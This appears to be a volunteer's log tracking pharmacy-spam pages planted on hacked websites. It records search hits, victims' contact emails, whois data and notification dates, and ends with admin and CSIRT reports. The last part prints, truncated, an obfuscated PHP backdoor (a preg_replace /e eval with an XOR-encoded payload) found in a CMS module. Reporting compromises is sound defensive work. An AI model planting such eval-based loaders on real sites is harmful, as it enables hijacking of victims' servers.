https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CEUQFjAB&url=http%3A%2F%2Fprototypeplayground.net%2F%3Frvt%3D43&ei=tkGWUoaYJJLioAT924KABg&usg=AFQjCNFd1i9_uAuE_m05o9sx43tdH0i5EA&sig2=6U3EGHKf7rTHEy79iMzohg&bvm=bv.57155469,d.cGU
Hits 3 and 4.
thiefandbandit.com
Previously contacted
Hit 5. columbiagreenhouse.com
Nursery School in New York
info@columbiagreenhouse.com
info@sunraycomputer.com

Notified 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CFoQFjAE&url=http%3A%2F%2Fcolumbiagreenhouse.com%2Foldsite%2Fphotos%2F1%2F%3Ft%3D493&ei=tkGWUoaYJJLioAT924KABg&usg=AFQjCNHkz0Bfywio3VD3-Ynd3KpcDgOjEg&sig2=AY1lTmrGq1xvVjlW9shq6A&bvm=bv.57155469,d.cGU&cad=rja
Hit 6. viagra.com
Looks like a legitimate pharmacy site!
http://www.viagra.com/buy-real-viagra.aspx
Hit 7. yelp.com
Legitimate site
http://www.yelp.com/search?find_desc=viagra&find_loc=San+Francisco%2C+CA
Hit 8. canadadrugs.com
Looks legitimate
https://www.canadadrugs.com/products/viagra
Hit 9. coreynahman.com
Looks legitimate
http://www.coreynahman.com/viagra.html
Hits 10-11. anewwayoflife.org
Site was down, but came back up on 11-30-13
Twitter: @SusanBurtonLA

Informed 11-30-13

http://anewwayoflife.org/buy-viagra-perth/

http://anewwayoflife.org/buy-viagra-store/

Hit 12. vosh.org
VOLUNTEER OPTOMETRIC SERVICES TO HUMANITY
http://vosh.org/contact

Notified 11-27-13

http://www.vosh.org/viagraonline/
Directly hosted
Hit 13. buyviagraonlineman.com
Whois shows:
Owner Name: Whois Protection Owner Street: Fablovka 404 (All postal mail rejected) Owner City: Pardubice Owner ZIP: 53352 Owner Country: CZ Owner E-Mail: buyviagraonlineman.com
@fablovkawhoisprotection.com Nameserver: ns.masterhost.ru Nameserver: ns2.masterhost.ru Nameserver: ns1.masterhost.ru
A Czech anonymizer with a Russian DNS server; looks like the center of the operation. I doubt anyone there cares about them hacking colleges outside Russia, anyway.
http://buyviagraonlineman.com/
Hit 14-15. www.iospress.nl
Previously notified
Hit 16. sedl.org
Already cleaned! https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CG8QFjAFOAo&url=http%3A%2F%2Fautism.sedl.org%2Findex.php%2Fabout-us&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNF04D1usOzrM_WTi9iKqfW1yDYwRQ&sig2=0DyJZ2LRBatr0LwV4SVG3A&bvm=bv.57155469,d.cGU
Hit 17. kotous.com
Already cleaned! https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CHgQFjAGOAo&url=http%3A%2F%2Fkotous.com%2Fcontact-us%2F&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNFbXdGZWiGuIcZfSltwPJwdufInug&sig2=puKYoDZg2lep7EkTKaTWMA&bvm=bv.57155469,d.cGU
Hit 18. larkenrose.com
Already cleaned! https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CIABEBYwBzgK&url=http%3A%2F%2Fwww.larkenrose.com%2Fstore.html&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNEeIKGkJg-2YhCc2AFkz142pFuAZw&sig2=ysxTuu4bJ_nGztS7-RIHaw&bvm=bv.57155469,d.cGU
Hit 19. becomehealthyandrich.com
A front for the same scammers, most links are broken, the one that works goes to one of the same pages
Whois:
Registrar WHOIS Server: whois.dynadot.com Registrar: DYNADOT LLC Registrar IANA ID: 472 Registrar Abuse Contact Email: Email Masking Image@dynadot.com Registrant Name: Gareev Anatoliy Registrant Street: Khokhryakova, 2, 15 Registrant City: Perm Registrant State/Province: Perm Registrant Postal Code: 614000 Registrant Country: RU Registrant Email: Email Masking Image@gmail.com Name Server: ns1.dietrichnames.com Name Server: ns2.dietrichnames.com
Once again, that looks like people who probably don't care about the hacking these guys are doing.
http://becomehealthyandrich.com/
Hit 20. neara.org
NEW ENGLAND ANTIQUITIES RESEARCH ASSOCIATION
deveau@chebucto.ns.ca
danleary@mrf-furnaces.com
krosspt@lincoln.midcoast.com

Notified 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CJABEBYwCTgK&url=http%3A%2F%2Fneara.org%2F%3Fcbe%3D819&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNFO3d8aBdbePz5xvmesAPwfKG3iVg&sig2=mxfQ9TOraOaroILDR8Gg2A&bvm=bv.57155469,d.cGU
Hit 30. pharmacyathome.com
A scam site according to

http://www.scamadviser.com/
check-website/pharmacyathome.com

http://www.pharmacyathome.com/
Hit 31. absecon.com
Site unfinished, but links to http://abseconfrp.com/Home_Page.php , a mill in NJ
composites@absecon.com
abuse@absecon.com
security@absecon.com

Notified 11-27-13

http://www.absecon.com/buy-cheap-viagra/

Many more linked from that page

Hits for "buy viagra online"

Hit 4 icheapviagraonline.com
Hosting one of the known scam pages
Whois shows a site registered privately in China.

But they use CoudDNS servers, and they have an abuse form here:
http://www.cloudns.net/contact/

Reported 11-27-13


Hit 7. longislandassociation.org
KLaw@longislandassociation.org
mcohen@longislandassociation.org

Notified 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CHEQFjAG&url=http%3A%2F%2Fwww.longislandassociation.org%2Fprinters%2F&ei=eFaWUr2WAYjooASo-YCwCg&usg=AFQjCNGmFrSsYf0tyBbsa88MsNOQh3kTkA&sig2=ZEqZcFYj3mrYSLBGkXbn0A&bvm=bv.57155469,d.cGU
Hit 9. harvestworks.or
Already cleaned! https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CIEBEBYwCA&url=http%3A%2F%2Fwww.harvestworks.org%2F&ei=eFaWUr2WAYjooASo-YCwCg&usg=AFQjCNEoRhXS212-VVkrLPF6xdvKaYERnw&sig2=2AJG85ij6TUvMXzt1Dccxg&bvm=bv.57155469,d.cGU
Hit 10. accessrx.com
Seems legitimate

Hit 11. stbf.org
Strengthening The Black Family, Incorporated, NC
nikki.smith@co.wake.nc.us
torraine@torraine.com

Notified 11-27-13

http://www.stbf.org/viagra/

And many other pages linked to from that page

Linked from stbf.org: calsport.org
bjennings@calsport.org
webmaster@calsport.org

http://calsport.org/cialis-cost/

And many other pages linked to from that page

Linked from stbf.org: growandknow.org
NYC
marni@growandknow.org
marni.summer@gmail.com
http://growandknow.org/order-viagra/

And many other pages linked to from that page

Hit 14. nfayearbooks.com
Newburgh Free Academy
Alerted by contact form 11-27-13 https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFIQFjADOAo&url=http%3A%2F%2Fnfayearbooks.com%2F%3Fnfa%3D147&ei=zFmWUreqOcj2oAS4mIH4DA&usg=AFQjCNHvbMVLhM-OtysNebGQOWvFnYZZ8g&sig2=UDaWFK1voZ9j702tX7zNIA&bvm=bv.57155469,d.cGU
Hit 19. qhull.org
Part of uiuc.edu (My alma mater!)
qhull@qhull.org
webmaster@www.geom.uiuc.edu
https://illinois.edu/fb/sec/7175665

Notified 11-27-13

http://www.qhull.org/get-viagra-without-prescription/
Hit 20. whiteswanrecords.com
feedback@whiteswanrecords.com
http://cccc.co.za/contact/

Notified 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIMBEBYwCTgK&url=http%3A%2F%2Fwww.whiteswanrecords.com%2Fwebcomunity%2F&ei=zFmWUreqOcj2oAS4mIH4DA&usg=AFQjCNEuDUjPGMF511XB_epwsPjgjY4Fhw&sig2=Ve5vzSPQwh94djFgBMAApg&bvm=bv.57155469,d.cGU

Hits for "Buy Cialis"

Hit 1-2. easyteammanager.com and drury.edu
Already cleaned!
Hit 3. epmonthly.com
Emergency Physicians Monthly, NY
mplaster@epmonthly.com
editor@epmonthly.com
info@epmonthly.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CFgQFjAC&url=http%3A%2F%2Fwww.epmonthly.com%2Fadvertise%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNGcBxkYuED8Ll9C-K-UXIRhBp0eVA&sig2=XerqOWvX5isgvyuhZZ1jbQ&bvm=bv.57155469,d.cGU
Hit 4. enconline.com
ElDorado National, bus manufacturer, CA and KS
info@eldorado-ca.com
rmendoza@eldorado.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CGEQFjAD&url=http%3A%2F%2Fwww.enconline.com%2Fbuycialisonline%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNG4uz8gygcQtQqRIVWLoJRUY4uRGQ&sig2=Gcq1hPZAWz-nEn53xfqseg&bvm=bv.57155469,d.cGU
Hit 5. fabrand.com
Seller of duck decoys, KS
abuse@fabrand.com
security@fabrand.com
jdavis@bushnell.com
abuse@godaddy.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CGkQFjAE&url=http%3A%2F%2Fwww.fabrand.com%2Fbuycialis%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNGggBh5qW6-y0vZbJeyMRnrNBwr2A&sig2=oszw8VqQGtnGbduDlye4ag&bvm=bv.57155469,d.cGU
Hit 6. bobburdenski.com
Fund-raising trainer in Chicago
Info@BobBurdenski.com
Abuse@BobBurdenski.com
security@BobBurdenski.com
@annualfund on Twitter

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CHEQFjAF&url=http%3A%2F%2Fwww.bobburdenski.com%2Fnc.php&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNF-4s_C1bx03EfQa_Fj7SAs2VMR_w&sig2=cwUZNQJEBShddPgxj__iIg&bvm=bv.57155469,d.cGU
Hit 7-10 look legitimate.
http://www.scamadviser.com/is-buycialisonlineusa.biz-a-fake-site.html
Hit 13. selectyourgifts.com
service@selectyourgifts.com
This is apparently a scam site
http://inspirationforeverydaylife.blogspot.com/2009/01/scam-alert-wwwselectyourgiftscom.html
Hit 14. vanguarddefense.com
Manufacturer of drones in Texas
info@vanguarddefense.com
media@vanguarddefense.com
security@vanguarddefense.com
abuse@vanguarddefense.com

Twitter: @schipul @Tendenci

Notified 11-28-13

http://vanguarddefense.com/Cialis
http://vanguarddefense.com/buy-cialis
Hit 16-17. anewwayoflife.org
Website is damaged, cannot load the selling pages

Hit 19. icrisat.org
Crops research org.
Twitter: @icrisat @CGIAR

ICRISAT@CGIAR.ORG
ICRISAT-Nairobi@cgiar.org

Notified 11-28-13

http://www.icrisat.org/cialis/
Hit 20.emilystrange.com
Clothing and games,
noah@osmicDebris.com

Twitter: @EmilyTheStrange

Notified 11-28-13

http://www.emilystrange.com/compress/
Hit 23. advantageconnectpro.com/
info@advantageconnectpro.com
Informed via live chat

Notified 11-28-13

http://advantageconnectpro.com/acp/tadalafil-canada
Hit 23. apoptic.com
A blog from California
apoptic@gmail.com
abuse@godaddy.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=23&ved=0CFoQFjACOBQ&url=http%3A%2F%2Fwww.apoptic.com%2Fbota%2Fbuy-cialis&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNHjCKp-tb-oUff3KzkIeNBrA113Pg&sig2=uIJ9dlrt6gq87QeA6GJM-g&bvm=bv.57155469,d.cGU
Hit 25. ephudson.com
A band, I think
Twitter: @ep_hudson @PhillnMyself @_kosher

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=25&ved=0CGoQFjAEOBQ&url=http%3A%2F%2Fephudson.com%2Fwhere-buy-cialis%2F&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNG7mJ_BKg7EMqWHWFpD8q4xn2gqjg&sig2=7vXOnx538p_bweUCUEWlsg&bvm=bv.57155469,d.cGU
Hit 27. lamazoucheese.com
Cheese seller in NYC
lamazouinc@yahoo.com
hachhouch@gmail.com
domain.tech@yahoo-inc.com

Notified 11-28-13

http://lamazoucheese.com/buy_cialis_online
Hit 29. www.bsfsry.com
Big Fork Scenic Railway, KY
info@bsfsry.com
abuse@godaddy.com
busmgr@bsfsry.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CIYBEBYwCDgU&url=http%3A%2F%2Fwww.bsfsry.com%2Forder-cialis%2F&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNGDcrRXkh9-mE12psa8GMnP0GffyA&sig2=JNcFVZ-wL6Kg99Pl7Cl_hQ&bvm=bv.57155469,d.cGU
Hit 30. ysunews.com
Youngstown State University, OH
techdesk@ysu.edu
abuse@ysu.edu
security@ysu.edu
mbailey@ysu.edu
clbidwell@ysu.edu

Twitter: @YSUPolice @youngstownstate

Notified 11-28-13

http://www.ysunews.com/buy-cialis-professional/

Hits for "Buy Cialis Online"

Hit 20. rubinsboston.com
Restaurant in Boston. MA
tiffcfeng@gmail.com
bostonuadlab@gmail.com
info@rubinsboston.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CI8BEBYwCTgK&url=http%3A%2F%2Frubinsboston.com%2Fbuy-cialis-online-usa%2F&ei=JomXUug40eigBJzkgYAE&usg=AFQjCNFsDdnlKcmJGS1Sk_WzkaQvLqAVVg&sig2=qM58_P3b_9s2VAUJdczyUg&bvm=bv.57155469,d.cGU
Hit 21. elkton.org
Town of Elkton, MD
Twitter: @TownofElkton

administration@elkton.org
finance@elkton.org
mdonnelly@elktonpd.org

Notified 11-28-13

http://www.elkton.org/sec/
Hit 24. camdenhealth.org
Camden Coalition of Healthcare Providers, NJ
http://www.camdenhealth.org/contact-us/

Twitter: @camdenhealth

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CFEQFjADOBQ&url=http%3A%2F%2Fwww.camdenhealth.org%2Flogin-options%2F&ei=yIqXUpGCEov8oATE24DgDw&usg=AFQjCNEn7PmNWUPZRmGUDC3R06LrKw026Q&sig2=FgkDg5a_J3kJ9pguNNyv-Q&bvm=bv.57155469,d.cGU
Hit 32. imintcenter.org
DARPA Research Center, U. of Colorado
leeyc@colorado.edu
fitzstephens@colorado.edu

Twitter: @cuboulder

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CEIQFjABOB4&url=http%3A%2F%2Fwww.imintcenter.org%2F&ei=FY2XUu70FsbpoATDioL4Cw&usg=AFQjCNH39noUwCOMi2va9wg_IATUF2zNQQ&sig2=vqeIlTmoSm0OgtOm5CdS3g&bvm=bv.57155469,d.cGU
Hit 33. thesemblog.com
Web marketing company

along@schipul.com
abuse@schipul.com
security@schipul.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=33&ved=0CEkQFjACOB4&url=http%3A%2F%2Fthesemblog.com%2FCialis%2F&ei=FY2XUu70FsbpoATDioL4Cw&usg=AFQjCNEW3JLQKT-8e3iXVcfQik7L8dubIg&sig2=6tDldtS5X78vDML-7emR-Q&bvm=bv.57155469,d.cGU

Hits for "Buy Levitra"

Hit 1. amahouston.net
Marketing in Texas
info@amahouston.org

Loaded the rogue page once, but not again ?

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CD8QFjAA&url=http%3A%2F%2Famahouston.net%2Fpage%2F2%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNHhyjsT9CxOmYcsHOezVeCqMxEJ2g&sig2=KY0DGCO5y3iBfWXJ8jrCag&bvm=bv.57155469,d.cGU
Hit 3. www.workamper.com
Employment in Arknsas
support@workamper.com
john@workamper.com

Notified 11-28-13

http://www.workamper.com/buyvardenafil/
Hit 5. missillinois.org
ILStateDir@missillinois.org
statedirector@missillinois.org

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CGEQFjAE&url=http%3A%2F%2Fmissillinois.org%2Fbuy-levitra-now%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNFY-ZoBxQ14fbGabwcZU6OIgpEt2A&sig2=XOQDMQ7cf4NqMJ-2blkXbg&bvm=bv.57155469,d.cGU
Hit 6. www.theoriginalscrapbox.com
http://www.theoriginalscrapbox.com/contacts

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CGgQFjAF&url=http%3A%2F%2Fwww.theoriginalscrapbox.com%2Fapp%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNFjTsOqDiUp6a69N_jQ55x6TPLzKw&sig2=7azPXBhIA8JoaAc88fokuQ&bvm=bv.57155469,d.cGU
Hit 7. www.capitolcorridor.org
A train in Oakland, CA
http://mygov.us/task/city/knowledge_base/submit_request.php?cityname=368&module=rt

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CG8QFjAG&url=http%3A%2F%2Fwww.capitolcorridor.org%2Fabout_ccjpa%2F%3Fy2fwa%3D427441&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNERTepzJQanRWT-wJJwcoCH_mIxag&sig2=53YLw06eTrqji6hTxghprA&bvm=bv.57155469,d.cGU
Hit 13. ohsweb.ohiohistory.org
Ohio Historical Society
collections@ohiohistory.org
http://www.ohiohistory.org/about-us/contact/website

Notified 11-28-13

http://ohsweb.ohiohistory.org/strocs/
Hit 18. www.caratsmartdiamonds.com
abuse@godaddy.com
ahadany@cox.net
abuse@caratsmartdiamonds.com
security@caratsmartdiamonds.com

Notified 11-28-13

www.caratsmartdiamonds.com/buy-levitra-overnight/‎
Hit 20. primogrill.com
http://primogrill.com/contact/

Notified 11-29-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIoBEBYwCTgK&url=http%3A%2F%2Fprimogrill.com%2Fcategory%2Fbuy-levitra-uk%2F&ei=uriXUqLYHJTnoAS3l4GwBA&usg=AFQjCNH9WoyKVZ976hSgxrPgXjNfPmCAQA&sig2=3-qDh5IgEOazWlZ_11l8sQ&bvm=bv.57155469,d.cGU

19. More inside information and Base64-encoded data (11-29-13)

Richard Hook from the New England Antiquities Research Assn. sent me this report:
For my part on the near.org web site I have replace the rogue .htaccess file and deleted two files that it pointed to. I am not enough of a hacker to know how to proceed from here.

James Cleeter from Janet CSIRT sent this to me:
"Did a Nessus scan of the box earlier. It found... Web Server Generic XSS Description The remote host is running a web server that fails to adequately sanitize request strings of malicious JavaScript. By leveraging this issue, an attacker may be able to cause arbitrary HTML and script code to be executed in a user's browser within the security context of the affected site."

Some of the modules for the CMS software seem to have been recently replaced. Some of the directories within ~/stecon/WWW/modules/ are new and are owned by www-data (Yes, apache shouldn't have been able to write there: first of probably many apologies from me). In particular, the file ~/stecon/WWW/modules/nuSOAP/nuSOAP.module.php now had a 20K block of multiply-encrypted code at the start. I include below the results of base64-decoding the code.

preg_replace("/IwOIddDwZObky1eqwBAZlfY/e", "tdwoOjAFLo6kk2xR0Edy2OWnj5UI7MsoqeS6DT=P96zhwmzuqRhhg5JEydNtq7WVapQd9Qs6Lh c8IQryiOVEIeJ79WonRA0rpPKmf3hqZ=nhQTVyhq3pKBkHXOvpOuV40ffdXCJwBwTREoFmU9Qe0 2mVEW=SGVLE2qiNtr=ucTBh8GIRDYwCPXXTuXm1sx5jdcxLJw7lE8IBDQSHpDJ5bhNK6z=nm5LE V9QfuMGyJO1MfIUJMeDnARy7GxisruxCrChaOnOY2EkVM6fZYjCZ11U7m4oSmaUTd2use0FUCqq PkKp9trXjgseHkHaMivfAmPsFNyaQdFfCQJA=1YiWFCeqK63spXsRmaX1NxFq4ltJvtIlGq8Mta 34Uuk=GSQtsni7aolTOUc0DkjKQfW07N3P8bPDtfwbIUWj993MRUKU6ufKP2JKEAaAcpELK2mSK 03I7uUNDei9OCId4Sn8TC9vsC734iJCgBLbvfpz=MxNO7qHNTEgWCRDEN68vE=QGLr2qWqqic5x Xj6k40GOBYSFlNCVSClYNSP5o6kLWd0tB4T62aJ3yc9Yp=t9CTWQllKPgua3MYlOQ6IHUS=Iu8g Y8PW=jsPKTZZzI1rUOSieMrmh0lpsiLGface0KuJdIiRRX0llQJFd2s=zTph21nWQF1PQjYts8A 0T0k6Ot=rjsrYAV63LiNcnCs4mGmTCmRWl2Q1kQhJ9Oh9kczv=CNnE6grBH=DuRZVIqKt7s357Z 3f3rQ2tddyY0eZGdd2v3L4iWmeDdX04Pdv7tloMEblD7=KYcAJULC4hoWkHujA0Bv5vVi9a=id6 hnT=ncUzeMWHj8PSfPRh=LSVtPvsxNnU27UeXoT32p=alOtGd=odK7y5Kim9vORmJlFhPYZFDYf pnNvGNZjXUWRf54cpGtRQTWyivMoylJcNXNUkm498PObIH4yOmEe6bSdMfH=FQcTopnNRfLNvao 4hhrwIwPDNigZCnZH52bhgDvyj7ATWpM5M5pUp6X4c5SehrmaiC9EGs3po40AiK5uDiDtcbl5U4 Y2k=RICPMI9Exm9wmf7fP=CSsfuTZDMx6xxM6zbG8YLu=IglobG4aJLIo6cC0pz5bmFVahcX6nH 6wngZEnRfwdnZXFcWuRPK4VgT39qxlysWbNwf1D=mgnB5sdPbufmn1H7sEmeqaLC2ZyVP2V2W93 PpVfGF=ss1zoh5QAkrMmhmZ43QOtmLk327W8AWptLdWsXnt8T7i2i9uZN9H1Jss=nE8nalWmEsT cVCYp98fg6O6HMC9VupVXtRAJ3Wv8EEYZGxEEujkoyfw=huVRYqpH8pQzBAwGFJgL8kQqI1U8VF 74zRKN8zU5elsgmdmrnH3jrIP10jwTpsLd0Vr7KAzomgJN=w5n4wMk5ba3ALLp5XI3t1x41mhbH rpHdiuVU87NYVFYhRDaoMSXBFQ3rxTze978gqS1nNDAjJZFacfEpybq4rije2X0zT6U=NKmbNn= XBExek3IXSzP=WzeNMcBfXWflgHBuuAGvF5OpvWCDLRChGhuS0wyWHS8nZ9WI0d5DWItGfvJqCM MIt8assNEzgAc60zD9R9AoFuuke5PgGcozYEhFSl6ymXtlLxidujGzS2ZwuoS1F8peAMkSxeGZ2 z=CmifVGmKYcjJMNbCTYrxY4Xrq2xFsmEvNmQjt3tGTSQggsizFOmdH0Ky184ij9SwkiUSaDYuW oP4VxsaBT5JSD8HA1qjy0VXhqq8tEqFt69Dspet0Y3QczYcpDBcBW1iBffvjK2RFzVxe1gcOYtq NGI3KJTMfIvhoPRNaIfg81Taqz35NkjarrR31lDVuy3XDJkdRE0O6SokGgdUGCuxuBojms6Vgxt j8TCOYBcSTF4alWurYdeHeIrG1mbVYJ6Ud8i29AIQFBqrXaXw525Y=lezM7KlFE7iAdY9ehOji6 P7UnsNelmdMFSYAc=Gg6ohYBe3itaGnqC8SuKwUwPh3h64060fzmBMogDMOeT3JVycE0OZvd7m= 2e0vddjEfwtAz6PTNGdj66n4IBom8PlyukiMDHRi4=js6zAI6dr1YTsgVWISluFUTohWvy6oydV tRW3M1iBN3uuNF4frmlB6OiR=WLnKp048VuIKSKYK5IX=A3qmdrhrPyql=SvpRolmYuwq5K1xTN wTFc7iIdOXR60RNu7eXgFwP3cIBS7UfsokJkISCWqURoleXg9vBChR50a7QWQvD5VNedgh1L2Gz blM9i9=leQfdratCqeGk1UET1lIAcP151B2Y=10eGd8x5q1kK7K=POSF1bFRq6Kg8A5724a8VXu OCjyMf9MvMe1B66Sl1dHwdAsT4HQOe=dhjRtDP6zbZpcUkv7ZNCKrC3=7=QJdPn=z5t4IorjDVB X7wSU=UfqXXpTW7c1KF1=0j3GMiqP5rnzc7JbPoGnAw7WsYM4dB3bktixRNCK5p=WkIy1w6cwrY IYwUQPWHq71NsGauRTZQq0ZdzKXR8DpFbbZrqwzVrpjZw=JCTiT0htbV4zm13R6TsUAXFztxdSL PRUSl4ljZTAuMzWCqn8=VR=tWycJRuUgBpzmhZL7tLq7=B9qp6pALoticKru6BQ7qEhNesJM5zI 52Fjg=OgL4OtVZZETbVOGZwU4edFYSNRIT1pTEKe8ZMRymWGCrVJFHe0m8E=ORQXlGB5KMXHlkZ ZLvgOb2Yh03fkzjkD22bc8dVHptOQSopeYKt1BGWA03kxbK1SAQu9tFEYyToF8TkVeSKgYhgWYG J1Q0HRP3O08SXumA1jUZ5zrDUFk1c07lyMk7d1xsyuALemMTKgtDUZHofre8paidnHYG9Lyw6y8 YaIskoao01vnVcHRHh1kK80Q6JDqE3mdRuK3YlgWaR=vtGC2o3ayzYDtiHZm=AERuOIIzpfP7eA plCfO67CuUGd3N3dN3iemxnumRO2Nt34T6YizUkjoqBg540GvhlWTNG6fUwtDnmWh=5WTe69J8d CzcJj0u7S9BNdW0MZmyvJypgHIbESXiVM=fw0OrQMtdqEc3dDpOMc5tjBJnUgKpsKJeIYKZl43Q 9UHaXwpkOiSxkba59ljqvsJ5GUTrNK8KfEl41QcDyv2YMQSK321nj=hpU1VhASsfWTXLj1PXkGv xXC8O4x3cwYGFNbnNuUtFnFRM6hjfnTR=WNOP=Frwex3rOe69znDcsUon3MHegYe4mtImzzXSmO =2t5zhh30PMm3Dz=iVYBO=vWljK02xN1n7uccRUaghCYk3XIMwKav6xWd8VUuiJXe5z7KJWrqZE PQcYdOi50cqV7nrPWPZttSipdrAJWZOmpr=I6iB5=rP7T7KpLjY538iVnje=9tlnalv"^"\x11\ x12\x16\x03g\x0d\x3b\x2f\x22\x09Z\x0a\x1fWP0Q6\x01O\x06\x103\x0b\x09Z1\x2c\ x1foF9\x1dR\x06\x0f7b\x7b\x26\x12T\x1c\x29\x05\x05\x03\x11\x23\x60\x3b\x0d\ x2cp\x1f\x29M\x0c\x2d8\x1cf\x23\x3c\x17\x12\x1d\x00\x08\x10\x17\x05\x29\x2f 6qp8\x0bM\x02\x18\x2ej\x02T\x0cTu\x2d\x1aEjt\x5b\x02C\x09\x01\x035\x04\x5f\ x13hG\x21\x5f\x1c\x0e\x1f5\x22I\x00\x06\x3a\x26\x041\x0875\x40\x3c\x26=VW\x 2c\x0fT\x0d\x2a\x2f\x23\x11Ef\x3c\x24\x5c\x10\x1c\x21\x0e\x182U\x60\x09\x1e \x29\x1aX\x3c\x16\x3b\x0f\x27\x03\x0b\x1bw\x19\x16DGVa\x09\x04h\x0bf\x1a\x0 6\x21O\x27\x3ea0\x7b\x03\x2d\x0fa7K\x01R\x22\x13W4\x18\x3fm\x03\x15mz\x24\x 14zg\x0f\x5f\x7d\x2d\x60P\x27\x08\x3ex6d\x16\x3aM\x2f\x10\x0e\x0b81\x19\x7f \x26\x0338\x00=\x00\x027\x06\x04\x06\x7d\x5b\x18\x01\x3bAuW\x075AEK\x26\x22 \x17=S\x0b\x1d\x236\x00\x09\x2e\x2c\x17qPj\x09\x1b\x0e9E\x01\x02FTZ\x5f\x0b 8\x0a\x608\x22X\x18\x3fP\x021\x16\x1a\x25F\x06\x04\x3a1vAB\x11\x1f\x3e\x1a\ x01=\x26\x02\x12\x25\x1f\x40\x17\x10\x3b\x0010\x24\x0d\x12e\x26\x0e\x2f\x06 2\x21\x27pF3\x2e\x21\x0aw\x08\x07\x7bGU\x11\x3f\x20\x25\x22\x2633\x02\x23S\ x2b7\x7d\x09A\x1e\x2430\x1e\x3f\x2bO=\x1bRD\x7b=\x21\x12h\x1f\x06i\x07\x27\ x3b\x22s\x20\x04\x27\x2c\x22\x14\x0f\x5dq\x1e\x3c\x1c\x3f\x2e\x12\x5d\x06\x 2dX\x19\x0e\x0e\x1d6=\x09\x1d2\x22m\x1c\x0e\x7eV\x5e\x17\x2b\x26\x1d2B\x18\ x0d\x124e\x21\x02\x07\x0b\x03j\x2f\x3f\x2e\x20\x09\x60\x3a=\x1ei\x01\x18f\x 5e\x11y\x11T\x3ex\x0c\x10y\x1d\x07\x04\x20\x13\x15\x2bZN\x17\x0eBC\x02\x20\ x00\x0b\x0e\x26\x21\x08\x2cSI\x23O\x3a\x11\x01\x00D\x2b\x2c\x07\x23\x03\x2f \x18\x16g3\x1c\x27lH05\x0ff\x12\x7d\x1bx0\x3a\x3b\x03X\x0d\x02\x3e\x28\x00B \x5cVw0\x3f\x11\x2db\x09\x05\x26\x0e\x1c\x125==\x2f\x17\x15R\x0ez\x18y\x3eT \x5b\x3c\x26z\x04Wh\x2c\x23\x5f\x11\x02\x5d8I\x7f\x20Kw\x19\x07\x21YU=\x3e\ x23\x1d\x22\x0a\x14m\x5c\x60\x10\x5fx\x29\x17\x7c\x05\x1e\x2dOQ\x0er\x27xr\ x04K\x08\x13\x7b\x0b\x13\x3e\x02k\x3f6\x19\x02\x2f\x1f\x02\x28\x26Z\x7f\x5f \x0a2\x26975\x20\x15\x23s\x259\x10Q\x10\x0c\x17\x3f\x0bs\x1d\x3f7\x3e\x03\x 08C\x3en\x3c\x0e\x17\x06tx\x27\x19\x3a\x02Ifa\x3e\x12F6J5XgQ\x01\x0ex\x25\x 12\x16\x23\x12=h\x19\x26\x0fi\x0dQ\x2a\x0b\x2d\x14\x12w\x5e\x7f\x3b\x18\x16 \x1b\x261\x28j\x06\x00\x03\x18\x05\x10\x09\x23\x03T\x0a\x01\x29\x5dt\x11\x2 f\x20\x12l6\x13\x17\x12\x161\x2d\x3f6\x2c\x08\x1a\x1a\x03b6BCp\x2eP\x24\x60 